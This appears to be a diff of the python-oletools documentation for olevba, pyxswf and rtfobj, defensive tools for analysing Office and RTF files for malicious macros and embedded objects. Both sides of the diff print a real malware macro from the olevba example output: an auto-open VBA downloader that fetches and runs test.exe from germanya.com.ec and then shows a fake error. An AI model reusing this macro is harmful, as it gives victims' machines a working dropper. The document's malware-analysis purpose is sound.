-olevba.py MalwareZoo/VBA/*.zip -r -z infected -f *.doc
-When a single file is scanned, or when using the option -d, all details of the analysis are displayed.
-For example, checking the malware sample DIAN_caso-5415.doc:
->olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
-===============================================================================
-FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
-Type: OLE
--------------------------------------------------------------------------------
-VBA MACRO ThisDocument.cls
-in file: DIAN_caso-5415.doc.malware - OLE stream: Macros/VBA/ThisDocument
-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-Option Explicit
-Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long,_
-ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
-ByVal HQTLDG As Long) As Long
-Sub AutoOpen()
- Auto_Open
-End Sub
-Sub Auto_Open()
-SNVJYQ
-End Sub
-Public Sub SNVJYQ()
- OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.
-exe"
-End Sub
-Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
- Dim HRKUYU, lala As Long
- HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
- If HRKUYU = 0 Then OGEXYR = True
- Dim YKPZZS
- YKPZZS = Shell(PHHWIV, 1)
- MsgBox "El contenido de este documento no es compatible con este equipo." &
-vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no
- compatible"
- lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi
-ron("TMP") & "\lkjljlljk", 0, 0)
- Application.DisplayAlerts = False
- Application.Quit
-End Function
-Sub Workbook_Open()
- Auto_Open
-End Sub
-
-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-ANALYSIS:
-+------------+----------------------+-----------------------------------------+
-| Type | Keyword | Description |
-+------------+----------------------+-----------------------------------------+
-| AutoExec | AutoOpen | Runs when the Word document is opened |
-| AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
-| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
-| Suspicious | Lib | May run code from a DLL |
-| Suspicious | Shell | May run an executable file or a system |
-| | | command |
-| Suspicious | Environ | May read system environment variables |
-| Suspicious | URLDownloadToFileA | May download files from the Internet |
-| IOC | http://germanya.com. | URL |
-| | ec/logs/test.exe" | |
-| IOC | http://germanya.com. | URL |
-| | ec/logs/counter.php" | |
-| IOC | germanya.com | Executable file name |
-| IOC | test.exe | Executable file name |
-| IOC | sfjozjero.exe | Executable file name |
-+------------+----------------------+-----------------------------------------+
-When several files are scanned, or when using the option -t, a summary of the analysis for each file is displayed. This is more convenient for quick triage of a collection of suspicious files.
-The following flags show the results of the analysis:
-Here is an example:
-c:\>olevba.py \MalwareZoo\VBA\samples\*
-Flags Filename
------------ -----------------------------------------------------------------
-OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_1.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_2.doc.malware
-OLE:MASI--- \MalwareZoo\VBA\samples\DRIDEX_3.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_4.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_5.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_6.doc.malware
-OLE:MAS---- \MalwareZoo\VBA\samples\DRIDEX_7.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_8.doc.malware
-OLE:MASIHBD \MalwareZoo\VBA\samples\DRIDEX_9.xls.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_A.doc.malware
-OLE:------- \MalwareZoo\VBA\samples\Normal_Document.doc
-OLE:M------ \MalwareZoo\VBA\samples\Normal_Document_Macro.doc
-OpX:MASI--- \MalwareZoo\VBA\samples\RottenKitten.xlsb.malware
-OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
-OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
-olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code from your own python applications.
-IMPORTANT: olevba is currently under active development, therefore this API is likely to change.
-First, import the oletools.olevba package, using at least the VBA_Parser and VBA_Scanner classes:
-from oletools.olevba import VBA_Parser, VBA_Scanner
-To parse a file on disk, create an instance of the VBA_Parser class, providing the name of the file to open as parameter. For example:
-vba = VBA_Parser('my_file_with_macros.doc')
-The file may also be provided as a bytes string containing its data. In that case, the actual filename must be provided for reference, and the file content with the data parameter. For example:
-myfile = 'my_file_with_macros.doc'
-filedata = open(myfile, 'rb').read()
-vba = VBA_Parser(myfile, data=filedata)
-VBA_Parser will raise an exception if the file is not a supported format, either OLE (MS Office 97-2003) or OpenXML (MS Office 2007+).
-The method detect_vba_macros of a VBA_Parser object returns True if VBA macros have been found in the file, False otherwise.
-if vba.detect_vba_macros():
- print 'VBA Macros found'
-else:
- print 'No VBA Macros found'
-Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will always return False because VBA Macros are stored in a different way which is not yet supported by olevba.
-Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.
-The method extract_macros extracts and decompresses source code for each VBA macro found in the file (possibly including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code) for each VBA macro found.
-Example:
-for (filename, stream_path, vba_filename, vba_code) in vba.extract_macros():
- print '-'*79
- print 'Filename :', filename
- print 'OLE stream :', stream_path
- print 'VBA filename:', vba_filename
- print '- '*39
- print vba_code
-Note: this API is under active development and may change in the future.
-The class VBA_Scanner can be used to scan the source code of a VBA module to find obfuscated strings, suspicious keywords, IOCs, auto-executable macros, etc.
-First, create a VBA_Scanner object with a string containing the VBA source code (for example returned by the extract_macros method). Then call the methods scan or scan_summary to get the results of the analysis.
-scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value.
-scan returns a list of tuples (type, keyword, description), one for each item in the results.
-Example:
-vba_scanner = VBA_Scanner(vba_code)
-results = vba_scanner.scan(include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
-The function scan_vba is a shortcut for VBA_Scanner(vba_code).scan():
-results = scan_vba(vba_code, include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
-scan_summary returns a tuple with the number of items found for each category: (autoexec, suspicious, IOCs, hex, base64, dridex).
-Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
-The function detect_autoexec checks if VBA macro code contains specific macro names that will be triggered when the document/workbook is opened, closed, changed, etc.
-It returns a list of tuples containing two strings, the detected keyword, and the description of the trigger. (See the malware example above)
-Sample usage:
-from oletools.olevba import detect_autoexec
-autoexec_keywords = detect_autoexec(vba_code)
-if autoexec_keywords:
- print 'Auto-executable macro keywords found:'
- for keyword, description in autoexec_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Auto-executable macro keywords: None found'
-Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
-The function detect_suspicious checks if VBA macro code contains specific keywords often used by malware to act on the system (create files, run commands or applications, write to the registry, etc).
-It returns a list of tuples containing two strings, the detected keyword, and the description of the corresponding malicious behaviour. (See the malware example above)
-Sample usage:
-from oletools.olevba import detect_suspicious
-suspicious_keywords = detect_suspicious(vba_code)
-if suspicious_keywords:
- print 'Suspicious VBA keywords found:'
- for keyword, description in suspicious_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Suspicious VBA keywords: None found'
-Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
-The function detect_patterns checks if VBA macro code contains specific patterns of interest, that may be useful for malware analysis and detection (potential Indicators of Compromise): IP addresses, e-mail addresses, URLs, executable file names.
-It returns a list of tuples containing two strings, the pattern type, and the extracted value. (See the malware example above)
-Sample usage:
-from oletools.olevba import detect_patterns
-patterns = detect_patterns(vba_code)
-if patterns:
- print 'Patterns found:'
- for pattern_type, value in patterns:
- print '%s: %s' % (pattern_type, value)
-else:
- print 'Patterns: None found'
-After usage, it is better to call the close method of the VBA_Parser object, to make sure the file is closed, especially if your application is parsing many files.
-vba.close()
-olevba
+======
+olevba is a script to parse OLE and OpenXML files such as MS Office documents
+(e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text,
+and detect security-related patterns such as auto-executable macros, **suspicious
+VBA keywords** used by malware, anti-sandboxing and anti-virtualization techniques,
+and potential IOCs (IP addresses, URLs, executable filenames, etc).
+It also detects and decodes several common **obfuscation methods including Hex encoding,
+StrReverse, Base64, Dridex**, and extracts IOCs from decoded strings.
+It can be used either as a command-line tool, or as a python module from your own applications.
+It is part of the python-oletools package.
+olevba is based on source code from officeparser
+by John William Davison, with significant modifications.
+Word 97-2003 (.doc, .dot)
Word 2007+ (.docm, .dotm)
Word 2003 XML (.xml)
Excel 97-2003 (.xls)
Excel 2007+ (.xlsm, .xlsb)
PowerPoint 2007+ (.pptm, .ppsm)
Detect VBA macros in MS Office 97-2003 and 2007+ files
Extract VBA macro source code
Detect auto-executable macros
Detect suspicious VBA keywords often used by malware
Detect anti-sandboxing and anti-virtualization techniques
Detect and decodes strings obfuscated with Hex/Base64/StrReverse/Dridex
Extract IOCs/patterns of interest such as IP addresses, URLs, e-mail addresses and executable file names
Scan multiple files and sample collections (wildcards, recursive)
Triage mode for a summary view of multiple files
Scan malware samples in password-protected Zip archives
Python API to use olevba from your applications
MS Office files encrypted with a password are also supported, because VBA macro code is never
+encrypted, only the content of the document.
+See this article for more information and technical details about VBA Macros
+and how they are stored in MS Office documents.
+olevba checks the file type: If it is an OLE file (i.e MS Office 97-2003), it is parsed right away.
If it is a zip file (i.e. MS Office 2007+), olevba looks for all OLE files stored in it (e.g. vbaProject.bin), and opens them.
olevba identifies all the VBA projects stored in the OLE structure.
Each VBA project is parsed to find the corresponding OLE streams containing macro code.
In each of these OLE streams, the VBA macro source code is extracted and decompressed (RLE compression).
olevba looks for specific strings obfuscated with various algorithms (Hex, Base64, StrReverse, Dridex).
olevba scans the macro source code and the deobfuscated strings to find suspicious keywords, auto-executable macros
and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames, etc).
+Usage: olevba.py [options] <filename> [filename2 ...]
+
+
+
+Options:
+
+ -h, --help show this help message and exit
+
+ -r find files recursively in subdirectories.
+
+ -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+
+ if the file is a zip archive, open first file from it,
+
+ using the provided password (requires Python 2.6+)
+
+ -f ZIP_FNAME, --zipfname=ZIP_FNAME
+
+ if the file is a zip archive, file(s) to be opened
+
+ within the zip. Wildcards * and ? are supported.
+
+ (default:*)
+
+ -t triage mode, display results as a summary table
+
+ (default for multiple files)
+
+ -d detailed mode, display full results (default for
+
+ single file)
+
+ -i INPUT, --input=INPUT
+
+ input file containing VBA source code to be analyzed
+
+ (no parsing)
+
+ --decode display all the obfuscated strings with their decoded
+
+ content (Hex, Base64, StrReverse, Dridex).
+Scan a single file:
+olevba.py file.doc
+Scan a single file, stored in a Zip archive with password "infected":
+olevba.py malicious_file.xls.zip -z infected
+Scan a single file, showing all obfuscated strings decoded:
+olevba.py file.doc --decode
+Scan VBA source code extracted into a text file:
+olevba.py -i source_code.vba
+Scan a collection of files stored in a folder:
+olevba.py MalwareZoo/VBA/*
+Scan all .doc and .xls files, recursively in all subfolders:
+olevba.py MalwareZoo/VBA/*.doc MalwareZoo/VBA/*.xls -r
+Scan all .doc files within all .zip files with password, recursively:
+olevba.py MalwareZoo/VBA/*.zip -r -z infected -f *.doc
+When a single file is scanned, or when using the option -d, all details of the analysis are displayed.
+For example, checking the malware sample DIAN_caso-5415.doc:
+>olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+
+===============================================================================
+
+FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
+
+Type: OLE
+
+-------------------------------------------------------------------------------
+
+VBA MACRO ThisDocument.cls
+
+in file: DIAN_caso-5415.doc.malware - OLE stream: Macros/VBA/ThisDocument
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Option Explicit
+
+Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long,_
+
+ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
+
+ByVal HQTLDG As Long) As Long
+
+Sub AutoOpen()
+
+ Auto_Open
+
+End Sub
+
+Sub Auto_Open()
+
+SNVJYQ
+
+End Sub
+
+Public Sub SNVJYQ()
+
+ OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.
+
+exe"
+
+End Sub
+
+Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
+
+ Dim HRKUYU, lala As Long
+
+ HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
+
+ If HRKUYU = 0 Then OGEXYR = True
+
+ Dim YKPZZS
+
+ YKPZZS = Shell(PHHWIV, 1)
+
+ MsgBox "El contenido de este documento no es compatible con este equipo." &
+
+vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no
+
+ compatible"
+
+ lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi
+
+ron("TMP") & "\lkjljlljk", 0, 0)
+
+ Application.DisplayAlerts = False
+
+ Application.Quit
+
+End Function
+
+Sub Workbook_Open()
+
+ Auto_Open
+
+End Sub
+
+
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ANALYSIS:
+
++------------+----------------------+-----------------------------------------+
+
+| Type | Keyword | Description |
+
++------------+----------------------+-----------------------------------------+
+
+| AutoExec | AutoOpen | Runs when the Word document is opened |
+
+| AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
+
+| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+
+| Suspicious | Lib | May run code from a DLL |
+
+| Suspicious | Shell | May run an executable file or a system |
+
+| | | command |
+
+| Suspicious | Environ | May read system environment variables |
+
+| Suspicious | URLDownloadToFileA | May download files from the Internet |
+
+| IOC | http://germanya.com. | URL |
+
+| | ec/logs/test.exe" | |
+
+| IOC | http://germanya.com. | URL |
+
+| | ec/logs/counter.php" | |
+
+| IOC | germanya.com | Executable file name |
+
+| IOC | test.exe | Executable file name |
+
+| IOC | sfjozjero.exe | Executable file name |
+
++------------+----------------------+-----------------------------------------+
+When several files are scanned, or when using the option -t, a summary of the analysis for each file is displayed.
+This is more convenient for quick triage of a collection of suspicious files.
+The following flags show the results of the analysis:
+OLE: the file type is OLE, for example MS Office 97-2003
OpX: the file type is OpenXML, for example MS Office 2007+
?: the file type is not supported
M: contains VBA Macros
A: auto-executable macros
S: suspicious VBA keywords
I: potential IOCs
H: hex-encoded strings (potential obfuscation)
B: Base64-encoded strings (potential obfuscation)
D: Dridex-encoded strings (potential obfuscation)
Here is an example:
+c:\>olevba.py \MalwareZoo\VBA\samples\*
+
+Flags Filename
+
+----------- -----------------------------------------------------------------
+
+OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_1.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_2.doc.malware
+
+OLE:MASI--- \MalwareZoo\VBA\samples\DRIDEX_3.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_4.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_5.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_6.doc.malware
+
+OLE:MAS---- \MalwareZoo\VBA\samples\DRIDEX_7.doc.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_8.doc.malware
+
+OLE:MASIHBD \MalwareZoo\VBA\samples\DRIDEX_9.xls.malware
+
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_A.doc.malware
+
+OLE:------- \MalwareZoo\VBA\samples\Normal_Document.doc
+
+OLE:M------ \MalwareZoo\VBA\samples\Normal_Document_Macro.doc
+
+OpX:MASI--- \MalwareZoo\VBA\samples\RottenKitten.xlsb.malware
+
+OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
+
+OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
+olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code
+from your own python applications.
+IMPORTANT: olevba is currently under active development, therefore this API is likely to change.
+First, import the oletools.olevba package, using at least the VBA_Parser and VBA_Scanner classes:
+from oletools.olevba import VBA_Parser, VBA_Scanner
+To parse a file on disk, create an instance of the VBA_Parser class, providing the name of the file to open as parameter.
+For example:
+vba = VBA_Parser('my_file_with_macros.doc')
+The file may also be provided as a bytes string containing its data. In that case, the actual
+filename must be provided for reference, and the file content with the data parameter. For example:
+myfile = 'my_file_with_macros.doc'
+
+filedata = open(myfile, 'rb').read()
+
+vba = VBA_Parser(myfile, data=filedata)
+VBA_Parser will raise an exception if the file is not a supported format, either OLE (MS Office 97-2003) or OpenXML
+(MS Office 2007+).
+The method detect_vba_macros of a VBA_Parser object returns True if VBA macros have been found in the file,
+False otherwise.
+if vba.detect_vba_macros():
+
+ print 'VBA Macros found'
+
+else:
+
+ print 'No VBA Macros found'
+Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine
+for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will
+always return False because VBA Macros are stored in a different way which is not yet supported by olevba.
+Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method
+may return True if the embedded document contains VBA Macros, even if the main document does not.
+The method extract_macros extracts and decompresses source code for each VBA macro found in the file (possibly
+including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code)
+for each VBA macro found.
+filename: If the file is OLE (MS Office 97-2003), filename is the path of the file.
+If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive,
+e.g. word/vbaProject.bin.
stream_path: path of the OLE stream containing the VBA macro source code
vba_filename: corresponding VBA filename
vba_code: string containing the VBA source code in clear text
Example:
+for (filename, stream_path, vba_filename, vba_code) in vba.extract_macros():
+
+ print '-'*79
+
+ print 'Filename :', filename
+
+ print 'OLE stream :', stream_path
+
+ print 'VBA filename:', vba_filename
+
+ print '- '*39
+
+ print vba_code
+Note: this API is under active development and may change in the future.
+The class VBA_Scanner can be used to scan the source code of a VBA module to find obfuscated strings,
+suspicious keywords, IOCs, auto-executable macros, etc.
+First, create a VBA_Scanner object with a string containing the VBA source code (for example returned by the
+extract_macros method). Then call the methods scan or scan_summary to get the results of the analysis.
+scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded
+strings found in the code (Hex, Base64, Dridex) with their decoded value.
+scan returns a list of tuples (type, keyword, description), one for each item in the results.
+type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String'.
keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is
the decoded value of the string.
+Example:
+vba_scanner = VBA_Scanner(vba_code)
+
+results = vba_scanner.scan(include_decoded_strings=True)
+
+for kw_type, keyword, description in results:
+
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+The function scan_vba is a shortcut for VBA_Scanner(vba_code).scan():
+results = scan_vba(vba_code, include_decoded_strings=True)
+
+for kw_type, keyword, description in results:
+
+ print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+scan_summary returns a tuple with the number of items found for each category:
+(autoexec, suspicious, IOCs, hex, base64, dridex).
+Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
+The function detect_autoexec checks if VBA macro code contains specific macro names
+that will be triggered when the document/workbook is opened, closed, changed, etc.
+It returns a list of tuples containing two strings, the detected keyword, and the
+description of the trigger. (See the malware example above)
+Sample usage:
+from oletools.olevba import detect_autoexec
+
+autoexec_keywords = detect_autoexec(vba_code)
+
+if autoexec_keywords:
+
+ print 'Auto-executable macro keywords found:'
+
+ for keyword, description in autoexec_keywords:
+
+ print '%s: %s' % (keyword, description)
+
+else:
+
+ print 'Auto-executable macro keywords: None found'
+Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
+The function detect_suspicious checks if VBA macro code contains specific
+keywords often used by malware to act on the system (create files, run
+commands or applications, write to the registry, etc).
+It returns a list of tuples containing two strings, the detected keyword, and the
+description of the corresponding malicious behaviour. (See the malware example above)
+Sample usage:
+from oletools.olevba import detect_suspicious
+
+suspicious_keywords = detect_suspicious(vba_code)
+
+if suspicious_keywords:
+
+ print 'Suspicious VBA keywords found:'
+
+ for keyword, description in suspicious_keywords:
+
+ print '%s: %s' % (keyword, description)
+
+else:
+
+ print 'Suspicious VBA keywords: None found'
+Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
+The function detect_patterns checks if VBA macro code contains specific
+patterns of interest, that may be useful for malware analysis and detection
+(potential Indicators of Compromise): IP addresses, e-mail addresses,
+URLs, executable file names.
+It returns a list of tuples containing two strings, the pattern type, and the
+extracted value. (See the malware example above)
+Sample usage:
+from oletools.olevba import detect_patterns
+
+patterns = detect_patterns(vba_code)
+
+if patterns:
+
+ print 'Patterns found:'
+
+ for pattern_type, value in patterns:
+
+ print '%s: %s' % (pattern_type, value)
+
+else:
+
+ print 'Patterns: None found'
+After usage, it is better to call the close method of the VBA_Parser object, to make sure the file is closed,
+especially if your application is parsing many files.
+vba.close()
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
-It is part of the python-oletools package.
-pyxswf is an extension to xxxswf.py published by Alexander Hanel.
-Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
-It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
-For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
-Usage: pyxswf.py [options] <file.bad>
-
-Options:
- -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
- in each stream
- -f, --rtf Parse an RTF file to look for SWF in each embedded
- object
- -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
- saves it in the working dir. No addition args needed
- -h, --help show this help message and exit
- -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
- compressed it will be deflated. No addition args
- needed
- -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
- checkMD5 to define hashes. No addition args needed
- -H, --header Displays the SWFs file header. No addition args needed
- -d, --decompress Deflates compressed SWFS(s)
- -r PATH, --recdir=PATH
- Will recursively scan a directory for files that
- contain SWFs. Must provide path in quotes
- -c, --compress Compresses the SWF using Zlib
-C:\oletools>pyxswf.py -o word_flash.doc
-OLE stream: 'Contents'
-[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
- [ADDR] SWF 1 at 0x8 - FWS Header
-
-C:\oletools>pyxswf.py -xo word_flash.doc
-OLE stream: 'Contents'
-[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
- [ADDR] SWF 1 at 0x8 - FWS Header
- [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
-C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
-RTF embedded object size 1498557 at index 000036DD
-[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
-00036DD
- [ADDR] SWF 1 at 0xc40 - FWS Header
- [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
-TODO
-pyxswf
+======
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may
+be embedded in files such as MS Office documents (e.g. Word, Excel),
+which is especially useful for malware analysis.
+It is part of the python-oletools package.
+pyxswf is an extension to xxxswf.py published by Alexander Hanel.
+Compared to xxxswf, it can extract streams from MS Office documents by parsing
+their OLE structure properly, which is necessary when streams are fragmented.
+Stream fragmentation is a known obfuscation technique, as explained on
+http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
+It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
+For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
+Usage: pyxswf.py [options] <file.bad>
+
+
+
+Options:
+
+ -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
+
+ in each stream
+
+ -f, --rtf Parse an RTF file to look for SWF in each embedded
+
+ object
+
+ -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
+
+ saves it in the working dir. No addition args needed
+
+ -h, --help show this help message and exit
+
+ -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
+
+ compressed it will be deflated. No addition args
+
+ needed
+
+ -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
+
+ checkMD5 to define hashes. No addition args needed
+
+ -H, --header Displays the SWFs file header. No addition args needed
+
+ -d, --decompress Deflates compressed SWFS(s)
+
+ -r PATH, --recdir=PATH
+
+ Will recursively scan a directory for files that
+
+ contain SWFs. Must provide path in quotes
+
+ -c, --compress Compresses the SWF using Zlib
+C:\oletools>pyxswf.py -o word_flash.doc
+
+OLE stream: 'Contents'
+
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+
+ [ADDR] SWF 1 at 0x8 - FWS Header
+
+
+
+C:\oletools>pyxswf.py -xo word_flash.doc
+
+OLE stream: 'Contents'
+
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+
+ [ADDR] SWF 1 at 0x8 - FWS Header
+
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+
+RTF embedded object size 1498557 at index 000036DD
+
+[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
+
+00036DD
+
+ [ADDR] SWF 1 at 0xc40 - FWS Header
+
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+TODO
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+rtfobj is a Python module to extract embedded objects from RTF files, such as OLE ojects. It can be used as a Python library or a command-line tool.
-It is part of the python-oletools package.
-rtfobj.py <file.rtf>
-It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
-Usage as a python module:
-rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
-Example:
-import rtfobj
-for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
- print 'found object size %d at index %08X' % (len(data), index)
-rtfobj
+======
+rtfobj is a Python module to extract embedded objects from RTF files, such as
+OLE ojects. It can be used as a Python library or a command-line tool.
+It is part of the python-oletools package.
+rtfobj.py <file.rtf>
+It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
+Usage as a python module:
+rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
+Example:
+import rtfobj
+
+for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+
+ print 'found object size %d at index %08X' % (len(data), index)
+python-oletools documentation
+